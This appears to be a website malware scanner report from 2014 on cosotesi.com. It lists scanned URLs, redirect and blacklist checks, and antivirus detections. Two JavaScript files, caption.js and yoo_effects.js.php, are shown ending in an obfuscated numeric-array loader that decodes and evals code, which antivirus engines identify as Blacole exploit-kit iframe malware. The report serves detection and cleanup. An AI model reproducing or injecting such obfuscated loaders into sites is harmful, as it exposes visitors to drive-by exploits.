New scan:

Malware Scanner report for cosotesi.com

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://cosotesi.com/
200 OK
Content-Length: 301378
Content-Type: text/html
clean
http://cosotesi.com/media/system/js/caption.js
200 OK
Content-Length: 9162
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 7620 bytes are skipped ...
06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}

Antivirus reports:

AntiVir
JS/iFrame.BO.1
Avast
JS:Redirector-XU [Trj]
Ikarus
Trojan.Script
nProtect
Exploit.JS.Blacole.BT
K7AntiVirus
Trojan
Emsisoft
Exploit.JS.Blacole.BT (B)
Comodo
TrojWare.JS.Agent.AM
CAT-QuickHeal
JS/BlacoleRef.BV
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.D
DrWeb
JS.IFrame.278
Kaspersky
Trojan-Downloader.JS.Iframe.czf
Microsoft
Trojan:JS/BlacoleRef.BX
Fortinet
JS/Iframe.W!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.hd
NANO-Antivirus
Trojan.Script.Expack.uvpsi
ClamAV
JS.Trojan.Blacole-4
F-Secure
Exploit.JS.Blacole.BT
F-Prot
JS/IFrame.QW
AVG
HTML/Framer
Norman
Blacole.HB
Sophos
Mal/Iframe-AF
GData
Exploit.JS.Blacole.BT
Commtouch
JS/IFrame.QW
BitDefender
Exploit.JS.Blacole.BT

http://cosotesi.com/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1
200 OK
Content-Length: 42178
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

if(typeof MooTools=="undefined"){throw"Unable to load Shadowbox, MooTools library not found."}var Shadowbox={};Shadowbox.lib={getStyle:function(B,A){return $(B).getStyle(A)},setStyle:function(D,C,E){D=$(D);if(typeof C!="object"){var A={};A[C]=E;C=A}for(var B in C){D.setStyle(B,C[B])}},get:function(A){return $(A)},remove:function(A){A.parentNode.removeChild(A)},getTarget:function(A){return A.target||{}},preventDefault:function(A){new Event(A).preventDefault()},addEvent:function(C,A,B){$(C).addEve
... 41723 bytes are skipped ...
06,550,204,295,192,50,192,160,192,160,192,160,192,160,192,160,192,160,600,555,594,585,654,505,660,580,276,490,666,500,726,230,582,560,672,505,660,500,402,520,630,540,600,200,630,510,684,545,246,295,60,160,192,160,192,160,192,160,192,625,60,160,192,160,192,625,594,485,696,495,624,200,606,205,738,625,60,625,264,160,318,240,288,205,354];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");for(;1776-5+5>i;i+=1){j=i;if(e)s=s+r[fr+((e)?"Code":12)]((w[j]/(5+e("j%2"))));}
if(f)e(s);}

Antivirus reports:

AntiVir
JS/iFrame.BO.1
Avast
JS:Redirector-XU [Trj]
nProtect
Exploit.JS.Blacole.BT
Emsisoft
Exploit.JS.Blacole.BT (B)
Comodo
TrojWare.JS.Agent.AM
CAT-QuickHeal
JS/BlacoleRef.BV
McAfee-GW-Edition
Heuristic.BehavesLike.JS.Suspicious.G
DrWeb
JS.IFrame.278
Kaspersky
Trojan-Downloader.JS.Iframe.czf
Microsoft
Trojan:JS/BlacoleRef.BX
Fortinet
JS/Iframe.W!tr
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Expack.uvpsi
ClamAV
JS.Trojan.Blacole-5
F-Secure
Exploit.JS.Blacole.BT
AVG
HTML/Framer
Norman
Blacole.HB
Sophos
Mal/Iframe-AF
GData
Exploit.JS.Blacole.BT
BitDefender
Exploit.JS.Blacole.BT

http://cosotesi.com/index.php?option=com_content&view=article&id=5&Itemid=6&lang=es
200 OK
Content-Length: 301362
Content-Type: text/html
clean
http://cosotesi.com/index.php?option=com_content&view=article&id=4&Itemid=5&lang=es
200 OK
Content-Length: 301400
Content-Type: text/html
clean
http://cosotesi.com/index.php?option=com_content&view=article&id=3&Itemid=4&lang=es
200 OK
Content-Length: 300653
Content-Type: text/html
clean
http://cosotesi.com/index.php?option=com_contact&view=category&catid=3&Itemid=3&lang=es
200 OK
Content-Length: 300073
Content-Type: text/html
clean
http://cosotesi.com/index.php?option=com_contact&view=contact&id=2&Itemid=2&lang=es
200 OK
Content-Length: 300940
Content-Type: text/html
clean
http://cosotesi.com/media/system/js/validate.js
200 OK
Content-Length: 4246
Content-Type: application/javascript
clean
http://cosotesi.com/index.php?option=com_contact&view=contact&id=2&Itemid=2&lang=en
200 OK
Content-Length: 300675
Content-Type: text/html
clean
http://cosotesi.com/index.php?option=com_content&view=article&id=5&Itemid=6&lang=en
200 OK
Content-Length: 300810
Content-Type: text/html
clean
http://cosotesi.com/index.php?option=com_content&view=article&id=4&Itemid=5&lang=en
200 OK
Content-Length: 301431
Content-Type: text/html
clean
http://cosotesi.com/index.php?option=com_content&view=article&id=3&Itemid=4&lang=en
200 OK
Content-Length: 300097
Content-Type: text/html
clean
http://cosotesi.com/index.php?option=com_contact&view=category&catid=3&Itemid=3&lang=en
200 OK
Content-Length: 301081
Content-Type: text/html
clean
http://cosotesi.com/test404page.js
404 Not Found
Content-Length: 958
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: cosotesi.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 May 2014 03:36:05 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html
X-Powered-By: PHP/5.4.26
Second query (visit from search engine):
GET / HTTP/1.1
Host: cosotesi.com
Referer: http://www.google.com/search?q=cosotesi.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=cosotesi.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cosotesi.com/

Result: cosotesi.com is not infected or malware details are not published yet.